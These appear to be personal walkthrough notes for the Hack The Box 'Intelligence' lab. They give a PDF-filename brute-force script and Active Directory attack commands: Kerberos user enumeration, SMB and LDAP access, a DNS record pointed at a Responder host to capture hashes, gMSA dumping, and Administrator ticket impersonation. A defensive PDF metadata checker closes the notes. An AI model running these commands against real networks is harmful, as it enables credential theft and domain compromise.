Intelligence
https://app.hackthebox.eu/machines/Intelligence
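domain - intelligence administrator
http://10.10.10.248/documents/2020-12-15-upload.pdf
year-mm-dd

import requests
from datetime import date as d, timedelta

url = "http://10.10.10.248/documents/"
# Candidate names in year-mm-dd form; covering all of 2020 is an assumption based on the sample URL
date = [(d(2020, 1, 1) + timedelta(days=n)).isoformat() for n in range(366)]

for i in range(0, len(date)):
    b = requests.get(url + date[i] + "-upload.pdf", timeout=5)
    if b.status_code == 200:
        print(date[i] + ":Yes")
        # keep a local copy of each document that exists
        with open(date[i] + ".pdf", "wb") as a:
            a.write(b.content)
    else:
        print(date[i] + ":No")

- GetNPUsers.py -dc-ip 10.10.10.248 -usersfile pdf_users intelligence/
- ./kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d "intelligence" ../intelligence/pdf_users [99 users]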
smbclient -U "Tiffany.Molina%[redacted]" -L 10.10.10.248
- python3 crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p '[redacted]' -x whoami
- spider all shares using crackmapexec [viewable at /tmp/]
python3 crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p '[redacted]' -M spider_plus
psexec.py <domain>/<username>:<password>@<IP>
psexec.py intelligence/Tiffany.Molina:[redacted]@10.10.10.248
DC=intelligence,DC=htb
CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
• LDAP
ldapsearch -x -h 10.10.10.248 -D "intelligence\Tiffany.Molina" -w [redacted] -b 'DC=intelligence,DC=htb'
- LDIF
dn: ou=People123,dc=intelligence,dc=htb
objectClass: organizationalUnit
ou: People123
ldapadd -x -h 10.10.10.248 -D "intelligence\Tiffany.Molina" -w [redacted] -b 'DC=intelligence,DC=htb' -f test1
- create LDAP DNS entry for responder IP
python3 dnstool.py -u intelligence\\Tiffany.Molina -p [redacted] -a add -d <resp. IP> -r webtemp.intelligence.htb 10.10.10.248
- check LDAP DNS record
ldapsearch -x -h 10.10.10.248 -D "intelligence\Tiffany.Molina" -w [redacted] -b 'DC=domaindnszones,DC=intelligence,DC=htb'
smbclient -L 10.10.10.248 --pw-nt-hash
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248
getST.py -dc-ip 10.10.10.248 -impersonate Administrator -hashes :c699eaac79b69357d9dabee3379547e6 intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb
smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass
---------------------------------
Path:
---------------------------------
- Enumerated SMB
- List of objects from LDAP
- Username from creator metadata of PDF is valid Windows user for domain "intelligence"
- Bruteforce a user using Kerberos
- writing data through LDAP using tiffany [INSUFF_ACCESS_RIGHTS]
- change default creds of user using LDAP?
- adding a DNS record with web*
- Cracking/Reusing the NTLMv2 Hash
- Using the new creds to get any gMSA-enabled accounts
- Get a Kerberos ticket using that service account and impersonating the Administrator
- Use the kerberos ticket to get access to SMB
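
The creator-metadata finding in the path above can be checked from the publishing side before documents reach a web server. This is an added example, not part of the original notes: it scans raw PDF bytes for /Creator and /Author entries that look like First.Last account names. The function names, the naming pattern and the sample documents are constructed assumptions; it reads only plain Info dictionaries and does not parse XMP or object streams.

```python
import re

# Account-style names (First.Last), the naming pattern of the users in these notes (assumed).
ACCOUNT_RE = re.compile(r"^[A-Z][a-z]+\.[A-Z][a-z]+$")
# /Creator or /Author followed by a literal string (...) or a hex string <...>.
FIELD_RE = re.compile(
    rb"/(Creator|Author)\s*(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)", re.S
)


def _decode(raw: bytes) -> str:
    """Decode a PDF literal or hex string into text."""
    if raw.startswith(b"<"):
        digits = re.sub(rb"\s", b"", raw[1:-1]).decode("ascii")
        if len(digits) % 2:  # PDF pads an odd-length hex string with a trailing 0
            digits += "0"
        data = bytes.fromhex(digits)
    else:
        # Drop the backslash of \( \) \\ ; octal and \n-style escapes are not expanded.
        data = re.sub(rb"\\(.)", rb"\1", raw[1:-1], flags=re.S)
    if data.startswith(b"\xfe\xff"):  # UTF-16BE text string with byte-order mark
        return data[2:].decode("utf-16-be", "replace")
    return data.decode("latin-1")


def leaked_accounts(pdf_bytes: bytes) -> list[tuple[str, str]]:
    """Return (field, value) pairs whose value looks like an account name."""
    hits = []
    for m in FIELD_RE.finditer(pdf_bytes):
        value = _decode(m.group(2)).strip()
        if ACCOUNT_RE.match(value):
            hits.append((m.group(1).decode(), value))
    return hits


# Constructed sample documents: minimal Info dictionaries, not files from the target.
SAMPLE_LEAKY = b"%PDF-1.5\n1 0 obj\n<< /Creator (Jane.Doe) /Producer (pdfTeX) >>\nendobj\n"
SAMPLE_HEX = b"%PDF-1.5\n1 0 obj\n<< /Author <FEFF004A006F0068006E002E0052006F0065> >>\nendobj\n"
SAMPLE_CLEAN = b"%PDF-1.5\n1 0 obj\n<< /Creator (TeX) >>\nendobj\n"

if __name__ == "__main__":
    for name, doc in [("leaky", SAMPLE_LEAKY), ("hex", SAMPLE_HEX), ("clean", SAMPLE_CLEAN)]:
        print(name, leaked_accounts(doc))
```

Any hit means the file should have its metadata stripped or rewritten before it is published.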